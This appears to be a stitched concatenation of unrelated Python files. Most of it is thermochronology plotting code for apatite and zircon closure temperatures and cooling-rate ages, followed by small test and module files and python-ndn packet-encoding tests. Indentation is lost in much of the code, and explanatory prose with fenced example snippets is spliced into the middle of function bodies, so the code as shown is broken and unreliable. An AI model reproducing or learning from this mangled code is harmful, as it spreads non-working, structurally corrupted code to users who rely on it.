ax[1].set_xscale("log")
# Add closure temperature contour labels
ax[1].clabel(ap_contours_tc)
# Create closure temperature contour fill
ap_contourf_tc2 = ax[1].tricontourf(
ap_x_list2,
ap_y_list2,
ahe_tc_list2,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in ap_contourf_tc2.collections:
c.set_edgecolor("face")
# Plot only values for zircon (U-Th)/He
elif plot_type == 2:
# --- Zircon cooling rate versus radius ---
# Create closure temperature contour lines
zr_contours_tc = ax[0].tricontour(
zr_x_list1,
zr_y_list1,
zhe_tc_list1,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Use log x-axis scaling
ax[0].set_xscale("log")
# Add closure temperature contour labels
ax[0].clabel(zr_contours_tc)
# Create closure temperature contour fill
zr_contourf_tc1 = ax[0].tricontourf(
zr_x_list1,
zr_y_list1,
zhe_tc_list1,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in zr_contourf_tc1.collections:
c.set_edgecolor("face")
# --- Zircon cooling rate versus eU plot ---
# Create closure temperature contour lines
zr_contours_tc = ax[1].tricontour(
zr_x_list2,
zr_y_list2,
zhe_tc_list2,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Use log x-axis scaling
ax[1].set_xscale("log")
# Add closure temperature contour labels
ax[1].clabel(zr_contours_tc)
# Create closure temperature contour fill
zr_contourf_tc2 = ax[1].tricontourf(
zr_x_list2,
zr_y_list2,
zhe_tc_list2,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in zr_contourf_tc2.collections:
c.set_edgecolor("face")
# Plot values for apatite and zircon (U-Th)/He
else:
# --- Apatite cooling rate versus radius ---
# Create closure temperature contour lines
ap_contours_tc = ax[0][0].tricontour(
ap_x_list1,
ap_y_list1,
ahe_tc_list1,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Use log x-axis scaling
ax[0][0].set_xscale("log")
# Add closure temperature contour labels
ax[0][0].clabel(ap_contours_tc)
# Create closure temperature contour fill
ap_contourf_tc1 = ax[0][0].tricontourf(
ap_x_list1,
ap_y_list1,
ahe_tc_list1,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in ap_contourf_tc1.collections:
c.set_edgecolor("face")
# --- Apatite cooling rate versus eU plot ---
# Create closure temperature contour lines
ap_contours_tc = ax[0][1].tricontour(
ap_x_list2,
ap_y_list2,
ahe_tc_list2,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Use log x-axis scaling
ax[0][1].set_xscale("log")
# Add closure temperature contour labels
ax[0][1].clabel(ap_contours_tc)
# Create closure temperature contour fill
ap_contourf_tc2 = ax[0][1].tricontourf(
ap_x_list2,
ap_y_list2,
ahe_tc_list2,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in ap_contourf_tc2.collections:
c.set_edgecolor("face")
# --- Zircon cooling rate versus radius plot ---
# Create closure temperature contour lines
zr_contours_tc = ax[1][0].tricontour(
zr_x_list1,
zr_y_list1,
zhe_tc_list1,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Use log x-axis scaling
ax[1][0].set_xscale("log")
# Add closure temperature contour labels
ax[1][0].clabel(zr_contours_tc)
# Create closure temperature contour fill
zr_contourf_tc1 = ax[1][0].tricontourf(
zr_x_list1,
zr_y_list1,
zhe_tc_list1,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in zr_contourf_tc1.collections:
c.set_edgecolor("face")
# --- Zircon cooling rate versus eU plot ---
# Create closure temperature contour lines
zr_contours_tc = ax[1][1].tricontour(
zr_x_list2,
zr_y_list2,
zhe_tc_list2,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Use log x-axis scaling
ax[1][1].set_xscale("log")
# Add closure temperature contour labels
ax[1][1].clabel(zr_contours_tc)
# Create closure temperature contour fill
zr_contourf_tc2 = ax[1][1].tricontourf(
zr_x_list2,
zr_y_list2,
zhe_tc_list2,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in zr_contourf_tc2.collections:
c.set_edgecolor("face")
# Format plot
# Apatite only
if plot_type == 1:
ax[0].set_title("Apatite (U-Th)/He closure temperature [°C]")
ax[1].set_title("Apatite (U-Th)/He closure temperature [°C]")
# Zircon only
elif plot_type == 2:
ax[0].set_title("Zircon (U-Th)/He closure temperature [°C]")
ax[1].set_title("Zircon (U-Th)/He closure temperature [°C]")
# Apatite and zircon
else:
ax[0][0].set_title("Apatite (U-Th)/He closure temperature [°C]")
ax[0][1].set_title("Apatite (U-Th)/He closure temperature [°C]")
ax[1][0].set_title("Zircon (U-Th)/He closure temperature [°C]")
ax[1][1].set_title("Zircon (U-Th)/He closure temperature [°C]")
# Apatite or Zircon
if plot_type < 3:
ax[0].set_xlabel("Cooling rate [°C/Myr]")
ax[1].set_xlabel("Cooling rate [°C/Myr]")
ax[0].set_ylabel("Equivalent spherical radius (µm)")
ax[1].set_ylabel("Effective uranium (ppm)")
# Apatite and zircon eU versus radius
else:
ax[0][0].set_xlabel("Cooling rate [°C/Myr]")
ax[0][1].set_xlabel("Cooling rate [°C/Myr]")
ax[0][0].set_ylabel("Equivalent spherical radius (µm)")
ax[0][1].set_ylabel("Effective uranium (ppm)")
ax[1][0].set_xlabel("Cooling rate [°C/Myr]")
ax[1][1].set_xlabel("Cooling rate [°C/Myr]")
ax[1][0].set_ylabel("Equivalent spherical radius (µm)")
ax[1][1].set_ylabel("Effective uranium (ppm)")
# Don't use scientific notation for x-axis
if plot_type < 3:
ax[0].xaxis.set_major_formatter(ScalarFormatter())
ax[1].xaxis.set_major_formatter(ScalarFormatter())
else:
ax[0][0].xaxis.set_major_formatter(ScalarFormatter())
ax[0][1].xaxis.set_major_formatter(ScalarFormatter())
ax[1][0].xaxis.set_major_formatter(ScalarFormatter())
ax[1][1].xaxis.set_major_formatter(ScalarFormatter())
# Use tight layout for subplots
plt.tight_layout()
# Save plot if requested
if save_plot:
# Set file name prefix
plot_filename = "rate_vs_radius_eu"
# Define plot filename based on type of plot and save plot
if plot_type == 1:
plot_savename = (
plot_filename + "_apatite_" + str(plot_dpi) + "dpi." + plot_file_format
)
elif plot_type == 2:
plot_savename = (
plot_filename + "_zircon_" + str(plot_dpi) + "dpi." + plot_file_format
)
else:
plot_savename = (
plot_filename
+ "_apatite_zircon_"
+ str(plot_dpi)
+ "dpi."
+ plot_file_format
)
plt.savefig(wd_orig + "/" + plot_savename, dpi=plot_dpi)
# Display plot if requested
if display_plot:
plt.show()
# Revert to original working directory
os.chdir(wd_orig)
return None
# Define function for creating plot of cooling rates
def rate_vs_age_tc(
num_points=101,
cooling_rate_min=0.1,
cooling_rate_max=100.0,
temp_max=350.0,
ap_u1=1.0,
ap_u2=20.0,
ap_u3=150.0,
zr_u1=10.0,
zr_u2=200.0,
zr_u3=4000.0,
ap_rad=45.0,
zr_rad=60.0,
ap_thorium=0.0,
zr_thorium=0.0,
ahe_uncertainty=0.1,
aft_uncertainty=0.2,
zhe_uncertainty=0.1,
plot_type=3,
plot_age_min=0.5,
plot_age_max=1800.0,
plot_tc_min=0.0,
plot_tc_max=200.0,
save_plot=False,
plot_file_format="pdf",
plot_dpi=300,
plot_style="seaborn-colorblind",
plot_alpha=0.6,
plot_grid=True,
display_plot=True,
clean_up_files=True,
verbose=False,
use_widget=False,
):
"""
Calculates thermochronometer ages and closure temperatures for different cooling rates and effective uranium
concentrations.
Parameters
----------
num_points : int, default=101
Number of points along x and y axes where ages/closure temperatures are
calculated.
cooling_rate_min : float, default=0.1
Minimum cooling rate in degrees C per Myr.
cooling_rate_max : float, default=100.0
Maximum cooling rate in degrees C per Myr.
temp_max : float, default=350.0
Max temperature for cooling history (in degrees C).
ap_u1 : float, default=1.0
Apatite uranium concentration in ppm for upper plot panel.
ap_u2 : float, default=20.0
Apatite uranium concentration in ppm for middle plot panel.
ap_u3 : float, default=150.0
Apatite uranium concentration in ppm for lower plot panel.
zr_u1 : float, default=10.0
Zircon uranium concentration in ppm for upper plot panel.
zr_u2 : float, default=200.0
Zircon uranium concentration in ppm for middle plot panel.
zr_u3 : float, default=4000.0
Zircon uranium concentration in ppm for lower plot panel.
ap_rad : float, default=45.0
Apatite equivalent spherical grain radius in micrometers.
zr_rad : float, default=60.0
Zircon equivalent spherical grain radius in micrometers.
ap_thorium : float, default=0.0
Apatite thorium concentration in ppm.
zr_thorium : float, default=0.0
Zircon thorium concentration in ppm.
ahe_uncertainty : float, default=0.1
Apatite (U-Th)/He age uncertainty fraction (0.1 = 10%)
aft_uncertainty : float, default=0.2
Apatite fission-track age uncertainty fraction (0.2 = 20%)
zhe_uncertainty : float, default=0.1
Zircon (U-Th)/He age uncertainty fraction (0.1 = 10%)
plot_type : int, default=3
1 = Cooling rate versus closure temperature
2 = Cooling rate versus age
3 = Cooling rate versus age and closure temperature
plot_age_min : float, default=0.5
Minimum age value in Ma for plots of cooling rate versus age. Only applies to plot_type 2 and 3.
plot_age_max : float, default=1800.0
Maximum age value in Ma for plots of cooling rate versus age. Only applies to plot_type 2 and 3.
plot_tc_min : float, default=0.0
Minimum closure temperature value in deg. C for plots of cooling rate versus closure temperature.
Only applies to plot_type 1 and 3.
plot_tc_max : float, default=200.0
Maximum closure temperature value in deg. C for plots of cooling rate versus closure temperature.
Only applies to plot_type 1 and 3.
save_plot : bool, default=False
Flag for whether to save the plot to a file.
plot_file_format : str, default='pdf'
File format for saving plot to file (examples: png, pdf, svg, eps).
plot_dpi : int, default=300
Saved plot resolution in dots per inch.
plot_style : str, default='seaborn-colorblind'
Style sheet used for plotting. See https://matplotlib.org/stable/gallery/style_sheets/style_sheets_reference.html.
plot_alpha : float, default=0.6
Transparency used for plotting fill colors for age swath plots.
plot_grid : bool, default=True
Flag for whether or not to display the plot grid lines.
display_plot : bool, default=True
Flag for whether to display the plot.
clean_up_files : bool, default=True
Flag for whether to delete temporary output files after the code has run.
verbose : bool, default=False
Enable/disable verbose output.
use_widget : bool, default=False
Enable/disable IPython progress bar widget. Disabled for command-line usage.
Returns
-------
None
"""
# Check to see whether ipywidgets and IPython are available for widget use
# If not, disable widgets and display a warning
if use_widget:
try:
import ipywidgets as widgets
except ModuleNotFoundError:
print("Warning: ipywidgets module not found. Disabling graphical progress bar.")
use_widget = False
if use_widget:
try:
from IPython.display import display
except ModuleNotFoundError:
print(
"Warning: IPython.display module not found. Disabling graphical progress bar."
)
use_widget = False
# Ensure relative paths work by setting working dir to dir containing this script file
wd_orig = os.getcwd()
script_path = os.path.abspath(__file__)
dir_name = os.path.dirname(script_path)
os.chdir(dir_name)
# Make lists for apatite and zircon uranium concentrations
ap_u_list = [ap_u1, ap_u2, ap_u3]
zr_u_list = [zr_u1, zr_u2, zr_u3]
# Set plot file name prefix
if plot_type == 1:
plot_filename = "rate_vs_tc"
elif plot_type == 2:
plot_filename = "rate_vs_age"
elif plot_type == 3:
plot_filename = "rate_vs_age_tc"
else:
raise ValueError("Bad value for plot_type. Must be 1, 2, or 3.")
# Define cooling rates to consider
rates = np.logspace(
start=np.log10(cooling_rate_min),
stop=np.log10(cooling_rate_max),
num=num_points,
)
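np.logspace with log10 endpoints yields rates that are evenly spaced on a logarithmic axis, matching the log-scaled x axes used in the plots. For example:

```python
import numpy as np

# Five cooling rates between 0.1 and 100 C/Myr, evenly spaced in log10
rates = np.logspace(start=np.log10(0.1), stop=np.log10(100.0), num=5)
print(rates)  # roughly [0.1, 0.562, 3.162, 17.783, 100.0]
```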
# Plot titles
title_list = [
f"Low eU (ap={ap_u_list[0]:.1f}, zr={zr_u_list[0]:.1f} ppm)",
f"Intermediate eU (ap={ap_u_list[1]:.1f}, zr={zr_u_list[1]:.1f} ppm)",
f"High eU (ap={ap_u_list[2]:.1f}, zr={zr_u_list[2]:.1f} ppm)",
]
# Define time-temperature history filename
tt_file = "simple_time_temp.txt"
# Get age calculation executable(s) to use
rdaam_command = get_tc_exec("RDAAM_He")
ketch_command = get_tc_exec("ketch_aft")
# Calculate total number of models that will be run
total_models = len(ap_u_list) * len(rates)
# Set model type string
if plot_type == 1:
model_type = "cooling rate versus closure temperature"
elif plot_type == 2:
model_type = "cooling rate versus age"
elif plot_type == 3:
model_type = "cooling rate versus age and closure temperature"
# Set plot style
plt.style.use(plot_style)
# Create figure
if plot_type == 3:
fig, ax = plt.subplots(3, 2, figsize=(12, 10))
else:
fig, ax = plt.subplots(3, 1, figsize=(6, 10))
# Create visual progress bar, if enabled
if use_widget and not verbose:
s = widgets.IntProgress(
value=0,
min=0,
max=total_models,
description="Calculating:",
bar_style="", # 'success', 'info', 'warning', 'danger' or ''
style={"bar_color": "#ff6666"},
orientation="horizontal",
)
display(s)
# Loop over plots/plot pairs
model_count = 0
for i in range(len(ap_u_list)):
ap_uranium = ap_u_list[i]
zr_uranium = zr_u_list[i]
# Create lists for plotables
rate_list = []
ahe_tc_list = []
aft_tc_list = []
zhe_tc_list = []
ahe_age_list = []
aft_age_list = []
zhe_age_list = []
for rate in rates:
model_count += 1
if not verbose:
if use_widget:
s.value = model_count
else:
print(
f"Calculating {model_type} - {int(round(100 * model_count / total_models)):3d}% ({model_count:5d} / {total_models:5d})\r",
end="",
)
# Define thermal history
start_time = temp_max / rate
with open(tt_file, "w") as f:
f.write("0.0,0.0\n")
f.write("{0:.4f},{1:.1f}".format(start_time, temp_max))
# Calculate He ages
command = f"{rdaam_command} {tt_file} {ap_rad} {ap_uranium} {ap_thorium} {zr_rad} {zr_uranium} {zr_thorium}"
p = subprocess.Popen(
command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
# Parse output for ages
stdout = p.stdout.readlines()
corr_ahe_age = stdout[0].split()[7].decode("UTF-8")
corr_zhe_age = stdout[1].split()[7].decode("UTF-8")
# Calculate AFT age
command = ketch_command + " " + tt_file
p = subprocess.Popen(
command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
# Parse output for AFT age
stdout = p.stdout.readlines()
aft_age = stdout[0].split()[4][:-1].decode("UTF-8")
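The AFT age is pulled out of the ketch_aft output by whitespace position, with the [:-1] slice dropping a trailing punctuation character before conversion. A sketch of that parsing on a made-up output line (the real program's output layout is an assumption here):

```python
# Hypothetical ketch_aft stdout line; token 4 is the age with a trailing comma
sample_line = b"Final FT age is: 123.45, MTL is: 14.50"
aft_age = float(sample_line.split()[4][:-1].decode("UTF-8"))
print(aft_age)  # 123.45
```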
# Use predicted ages to get closure temperature
tc_interp = interp1d([0.0, start_time], [0.0, temp_max])
ahe_tc = tc_interp(float(corr_ahe_age))
aft_tc = tc_interp(float(aft_age))
zhe_tc = tc_interp(float(corr_zhe_age))
# Add current iteration values to plotable lists
rate_list.append(rate)
ahe_tc_list.append(ahe_tc)
aft_tc_list.append(aft_tc)
zhe_tc_list.append(zhe_tc)
ahe_age_list.append(float(corr_ahe_age))
aft_age_list.append(float(aft_age))
zhe_age_list.append(float(corr_zhe_age))
# Echo ages for this iteration
if verbose:
print(
f"AHe: {float(corr_ahe_age):.2f} Ma (Tc: {ahe_tc:.1f}°C); AFT: {float(aft_age):.2f} Ma (Tc: {aft_tc:.1f}°C); ZHe: {float(corr_zhe_age):.2f} Ma (Tc: {zhe_tc:.1f}°C) -- total time: {start_time:.1f} Myr"
)
# Assign uncertainties if plotting ages
if plot_type != 1:
# Calculate age min and max values using given uncertainties
ahe_age_min = np.array(ahe_age_list) * (1.0 - ahe_uncertainty)
ahe_age_max = np.array(ahe_age_list) * (1.0 + ahe_uncertainty)
aft_age_min = np.array(aft_age_list) * (1.0 - aft_uncertainty)
aft_age_max = np.array(aft_age_list) * (1.0 + aft_uncertainty)
zhe_age_min = np.array(zhe_age_list) * (1.0 - zhe_uncertainty)
zhe_age_max = np.array(zhe_age_list) * (1.0 + zhe_uncertainty)
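The fractional uncertainties become symmetric min/max envelopes by scaling the age arrays, e.g. a 10% uncertainty shrinks or grows each age by a factor of 0.9 or 1.1:

```python
import numpy as np

ahe_age_list = [10.0, 50.0]  # example predicted ages in Ma
ahe_uncertainty = 0.1        # 10% fractional uncertainty
ahe_age_min = np.array(ahe_age_list) * (1.0 - ahe_uncertainty)
ahe_age_max = np.array(ahe_age_list) * (1.0 + ahe_uncertainty)
# lower band is ~[9, 45] Ma, upper band is ~[11, 55] Ma
```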
# Create plots for rate versus closure temperature
if plot_type == 1:
ax[i].semilogx(rate_list, ahe_tc_list, label="Apatite (U-Th)/He")
ax[i].semilogx(rate_list, aft_tc_list, label="Apatite FT")
ax[i].semilogx(rate_list, zhe_tc_list, label="Zircon (U-Th)/He")
# Create plots for rate versus age
if plot_type == 2:
ax[i].fill_between(
rate_list,
ahe_age_min,
ahe_age_max,
alpha=plot_alpha,
label=f"Apatite (U-Th)/He age ± {ahe_uncertainty * 100:.0f}%",
)
ax[i].fill_between(
rate_list,
aft_age_min,
aft_age_max,
alpha=plot_alpha,
label=f"Apatite FT age ± {aft_uncertainty * 100:.0f}%",
)
ax[i].fill_between(
rate_list,
zhe_age_min,
zhe_age_max,
alpha=plot_alpha,
label=f"Zircon (U-Th)/He age ± {zhe_uncertainty * 100:.0f}%",
)
# Scale axes
ax[i].set_xscale("log")
ax[i].set_yscale("log")
# Create plots for rate versus age and closure temperature
if plot_type == 3:
# Plot ages and closure temperatures (low eU)
ax[i][0].fill_between(
rate_list,
ahe_age_min,
ahe_age_max,
alpha=plot_alpha,
label=f"Apatite (U-Th)/He age ± {ahe_uncertainty * 100:.0f}%",
)
ax[i][1].plot(rate_list, ahe_tc_list, label="Apatite (U-Th)/He")
# Plot ages and closure temperatures (intermediate eU)
ax[i][0].fill_between(
rate_list,
aft_age_min,
aft_age_max,
alpha=plot_alpha,
label=f"Apatite FT age ± {aft_uncertainty * 100:.0f}%",
)
ax[i][1].plot(rate_list, aft_tc_list, label="Apatite FT")
# Plot ages and closure temperatures (high eU)
ax[i][0].fill_between(
rate_list,
zhe_age_min,
zhe_age_max,
alpha=plot_alpha,
label=f"Zircon (U-Th)/He age ± {zhe_uncertainty * 100:.0f}%",
)
ax[i][1].plot(rate_list, zhe_tc_list, label="Zircon (U-Th)/He")
# Set axis scalings
ax[i][0].set_xscale("log")
ax[i][0].set_yscale("log")
ax[i][1].set_xscale("log")
# Format axis tick labels
if plot_type == 3:
ax[i][0].xaxis.set_major_formatter(ScalarFormatter())
ax[i][1].xaxis.set_major_formatter(ScalarFormatter())
ax[i][0].yaxis.set_major_formatter(ScalarFormatter())
else:
ax[i].xaxis.set_major_formatter(ScalarFormatter())
ax[i].yaxis.set_major_formatter(ScalarFormatter())
# Set axis range and add axis labels
if plot_type == 1:
ax[i].set_xlim([cooling_rate_min, cooling_rate_max])
ax[i].set_ylim([plot_tc_min, plot_tc_max])
ax[i].set_ylabel("Closure temperature (°C)")
if i == 2:
ax[i].set_xlabel("Cooling rate (°C/Myr)")
# Set axis range and add axis labels
if plot_type == 2:
ax[i].set_xlim([cooling_rate_min, cooling_rate_max])
ax[i].set_ylim([plot_age_min, plot_age_max])
ax[i].set_ylabel("Age (Ma)")
if i == 2:
ax[i].set_xlabel("Cooling rate (°C/Myr)")
# Set axis ranges and add axis labels
if plot_type == 3:
ax[i][0].set_xlim([cooling_rate_min, cooling_rate_max])
ax[i][0].set_ylim([plot_age_min, plot_age_max])
ax[i][1].set_xlim([cooling_rate_min, cooling_rate_max])
ax[i][1].set_ylim([plot_tc_min, plot_tc_max])
ax[i][0].set_ylabel("Age (Ma)")
ax[i][1].set_ylabel("Closure temperature (°C)")
if i == 2:
ax[i][0].set_xlabel("Cooling rate (°C/Myr)")
ax[i][1].set_xlabel("Cooling rate (°C/Myr)")
# Add subplot titles
if plot_type == 3:
ax[i][0].set_title(title_list[i])
ax[i][1].set_title(title_list[i])
else:
ax[i].set_title(title_list[i])
# Enable/disable gridlines
if plot_grid:
if plot_type == 3:
ax[i][0].grid(visible=True)
ax[i][1].grid(visible=True)
else:
ax[i].grid(visible=True)
else:
if plot_type == 3:
ax[i][0].grid(visible=False)
ax[i][1].grid(visible=False)
else:
ax[i].grid(visible=False)
# Add legend
if plot_type == 3:
ax[i][0].legend()
ax[i][1].legend()
else:
ax[i].legend()
# Delete temporary tt file
if clean_up_files:
os.remove(tt_file)
os.remove("ft_length.csv")
# Use tight layout
plt.tight_layout()
# Save plot if requested
if save_plot:
# Define plot filename and save plot
plot_filename = plot_filename + "_" + str(plot_dpi) + "dpi." + plot_file_format
plt.savefig(wd_orig + "/" + plot_filename, dpi=plot_dpi)
# Show plot if requested
if display_plot:
plt.show()
# Revert to original working directory
os.chdir(wd_orig)
return None
# File: tests/learnergy/visual/test_tensor.py (repo: anukaal/learnergy, license: Apache-2.0)
import torch
from learnergy.visual import tensor
def test_show_tensor():
    t = torch.zeros(28, 28)
    tensor.show_tensor(t)
# File: mitmirror/main/routes/__init__.py (repo: Claayton/mitmirror-api, license: MIT)
"""Initialization of the routes module."""
from .users_routes import users
from .auth_routes import auth
# File: function.py (repo: bconti123/Python-Practice, license: MIT)
def bryant():
    print("Hey Bryant!!!")
    print("You're awesome!!!")


bryant()
# File: tests/encoding/ndn_format_0_3_test.py (repo: Zhiyi-Zhang/python-ndn, license: Apache-2.0)
# -----------------------------------------------------------------------------
# Copyright (C) 2019 Xinyu Ma
#
# This file is part of python-ndn.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
import hashlib
import pytest
from typing import List
from ndn.security import DigestSha256Signer
from ndn.encoding import Name, Component, InterestParam, MetaInfo, ContentType, SignatureType, \
    make_interest, make_data, parse_interest, parse_data, DecodeError, Signer, VarBinaryStr


class TestInterestMake:
    @staticmethod
    def test_default():
        name = Name.from_str('/local/ndn/prefix')
        interest = make_interest(name, InterestParam())
        assert interest == b'\x05\x1a\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix\x0c\x02\x0f\xa0'

        name = Name.encode(name)
        interest = make_interest(name, InterestParam())
        assert interest == b'\x05\x1a\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix\x0c\x02\x0f\xa0'

        name = '/local/ndn/prefix'
        interest = make_interest(name, InterestParam())
        assert interest == b'\x05\x1a\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix\x0c\x02\x0f\xa0'

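The expected byte strings in these tests follow the NDN packet format 0.3 TLV rules: 0x05 is the Interest packet type, the next byte is its length, 0x07 and 0x08 mark the Name and its GenericNameComponent children, and 0x0c\x02\x0f\xa0 is the default 4000 ms InterestLifetime. That outer structure can be sanity-checked by hand:

```python
wire = b'\x05\x1a\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix\x0c\x02\x0f\xa0'

assert wire[0] == 0x05            # Interest packet TLV type
assert wire[1] == len(wire) - 2   # outer length covers everything after the 2-byte header
assert wire[2] == 0x07            # Name TLV
assert wire[3] == 0x14            # 20 bytes for the three name components
assert wire[-4:] == b'\x0c\x02\x0f\xa0'  # InterestLifetime = 0x0fa0 = 4000 ms
print("TLV layout checks out")
```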
    @staticmethod
    def test_interest_params():
        name = '/local/ndn/prefix'
        int_param = InterestParam()
        int_param.can_be_prefix = True
        int_param.must_be_fresh = True
        int_param.hop_limit = 1
        int_param.nonce = 0
        int_param.lifetime = 10
        interest = make_interest(name, int_param)
        assert (interest == b'\x05\x26\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix'
                b'\x21\x00\x12\x00\x0a\x04\x00\x00\x00\x00\x0c\x01\x0a\x22\x01\x01')

    @staticmethod
    def test_mixed_name():
        name = ['local', Component.from_str('ndn'), 'prefix']
        interest = make_interest(name, InterestParam())
        assert interest == b'\x05\x1a\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix\x0c\x02\x0f\xa0'

    @staticmethod
    def test_app_param():
        name = '/local/ndn/prefix'
        app_param = b'\x01\x02\x03\x04'
        interest, final_name = make_interest(name, InterestParam(), app_param, need_final_name=True)
        assert (interest ==
                b'\x05\x42\x07\x36\x08\x05local\x08\x03ndn\x08\x06prefix'
                b'\x02 \x47\x75\x6f\x21\xfe\x0e\xe2\x65\x14\x9a\xa2\xbe\x3c\x63\xc5\x38'
                b'\xa7\x23\x78\xe9\xb0\xa5\x8b\x39\xc5\x91\x63\x67\xd3\x5b\xda\x10'
                b'\x0c\x02\x0f\xa0\x24\x04\x01\x02\x03\x04')
        assert (final_name
                == Name.decode(b'\x07\x36\x08\x05local\x08\x03ndn\x08\x06prefix'
                               b'\x02 \x47\x75\x6f\x21\xfe\x0e\xe2\x65\x14\x9a\xa2\xbe\x3c\x63\xc5\x38'
                               b'\xa7\x23\x78\xe9\xb0\xa5\x8b\x39\xc5\x91\x63\x67\xd3\x5b\xda\x10')[0])

        name = '/test/params-sha256=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF/ndn'
        interest = make_interest(name, InterestParam(), app_param)
        assert (interest ==
                b'\x05\x39\x07\x2d\x08\x04test'
                b'\x02 \x47\x75\x6f\x21\xfe\x0e\xe2\x65\x14\x9a\xa2\xbe\x3c\x63\xc5\x38'
                b'\xa7\x23\x78\xe9\xb0\xa5\x8b\x39\xc5\x91\x63\x67\xd3\x5b\xda\x10'
                b'\x08\x03ndn'
                b'\x0c\x02\x0f\xa0\x24\x04\x01\x02\x03\x04')

    @staticmethod
    def test_signed_interest():
        name = '/local/ndn/prefix'
        app_param = b'\x01\x02\x03\x04'
        int_param = InterestParam()
        int_param.nonce = 0x6c211166
        interest = make_interest(name, int_param, app_param, signer=DigestSha256Signer())
        assert (interest ==
                b'\x05\x6f\x07\x36\x08\x05local\x08\x03ndn\x08\x06prefix'
                b'\x02 \x8e\x6e\x36\xd7\xea\xbc\xde\x43\x75\x61\x40\xc9\x0b\xda\x09\xd5'
                b'\x00\xd2\xa5\x77\xf2\xf5\x33\xb5\x69\xf0\x44\x1d\xf0\xa7\xf9\xe2'
                b'\x0a\x04\x6c\x21\x11\x66\x0c\x02\x0f\xa0'
                b'\x24\x04\x01\x02\x03\x04'
                b'\x2c\x03\x1b\x01\x00'
                b'\x2e \xea\xa8\xf0\x99\x08\x63\x78\x95\x1d\xe0\x5f\xf1\xde\xbb\xc1\x18'
                b'\xb5\x21\x8b\x2f\xca\xa0\xb5\x1d\x18\xfa\xbc\x29\xf5\x4d\x58\xff')

        interest = make_interest(name, int_param, signer=DigestSha256Signer())
        assert (interest ==
                b'\x05\x6b\x07\x36\x08\x05local\x08\x03ndn\x08\x06prefix'
                b'\x02 \x40\x77\xa5\x70\x49\xd8\x38\x48\xb5\x25\xa4\x23\xab\x97\x8e\x64'
                b'\x80\xf9\x6d\x5c\xa3\x8a\x80\xa5\xe2\xd6\xe2\x50\xa6\x17\xbe\x4f'
                b'\x0a\x04\x6c\x21\x11\x66\x0c\x02\x0f\xa0'
                b'\x24\x00'
                b'\x2c\x03\x1b\x01\x00'
                b'\x2e \x09\x4e\x00\x9d\x74\x59\x82\x5c\xa0\x2d\xaa\xb7\xad\x60\x48\x30'
                b'\x39\x19\xd8\x99\x80\x25\xbe\xff\xa6\xf9\x96\x79\xd6\x5e\x9f\x62')

@staticmethod
def test_forwarding_hint():
name = '/local/ndn/prefix'
int_param = InterestParam()
int_param.nonce = 0x01020304
int_param.forwarding_hint = [
(0x87, '/name/A'),
(0x02, Name.from_str('/ndn/B')),
(0x12, b'\x07\x0d\x08\x0bshekkuenseu')
]
interest = make_interest(name, int_param)
assert (interest ==
b'\x05\x55\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix'
b'\x1e\x33'
b'\x1f\x0e\x1e\x01\x87\x07\x09\x08\x04name\x08\x01A'
b'\x1f\x0d\x1e\x01\x02\x07\x08\x08\x03ndn\x08\x01B'
b'\x1f\x12\x1e\x01\x12\x07\r\x08\x0bshekkuenseu'
b'\x0a\x04\x01\x02\x03\x04\x0c\x02\x0f\xa0')
@staticmethod
def test_throws():
with pytest.raises(ValueError):
make_interest("/invalid%%name", InterestParam())
with pytest.raises(TypeError):
make_interest("/ndn", InterestParam(lifetime=0.5))
with pytest.raises(TypeError):
make_interest("/ndn", InterestParam(forwarding_hint=[1, 2, 3]))
with pytest.raises(ValueError):
make_interest("/ndn", InterestParam(hop_limit=300))
with pytest.raises(ValueError):
make_interest("/params-sha256=4077", InterestParam())
with pytest.raises(ValueError):
make_interest("/params-sha256=4077", InterestParam(), b'')
class TestDataMake:
    @staticmethod
    def test_default():
        name = Name.from_str('/local/ndn/prefix')
        data = make_data(name, MetaInfo(), signer=DigestSha256Signer())
        assert (data ==
                b"\x06\x42\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix"
                b"\x14\x03\x18\x01\x00"
                b"\x16\x03\x1b\x01\x00"
                b"\x17 \x7f1\xe4\t\xc5z/\x1d\r\xdaVh8\xfd\xd9\x94"
                b"\xd8\'S\x13[\xd7\x15\xa5\x9d%^\x80\xf2\xab\xf0\xb5")
        name = Name.encode(name)
        data = make_data(name, MetaInfo(), b'01020304', signer=DigestSha256Signer())
        assert (data ==
                b'\x06L\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix'
                b'\x14\x03\x18\x01\x00'
                b'\x15\x0801020304'
